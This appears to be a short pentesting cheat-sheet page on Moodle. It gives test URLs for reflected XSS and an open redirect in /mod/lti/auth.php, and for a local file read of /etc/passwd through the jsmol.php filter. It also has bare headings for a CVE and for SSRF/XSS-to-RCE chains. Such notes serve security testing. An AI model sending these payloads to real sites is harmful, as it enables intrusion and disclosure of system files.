Moodle

Detection

Source code

<meta name="keywords" content="moodle,

Tests

  1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter

https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
  1. Open redirect in /mod/lti/auth.php in "redirect_url" parameter

https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
  1. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter

https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd

Moodle Scanner

CVE-2025-26529

SSRF to XSS - XSS to RCE Moodle

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Last updated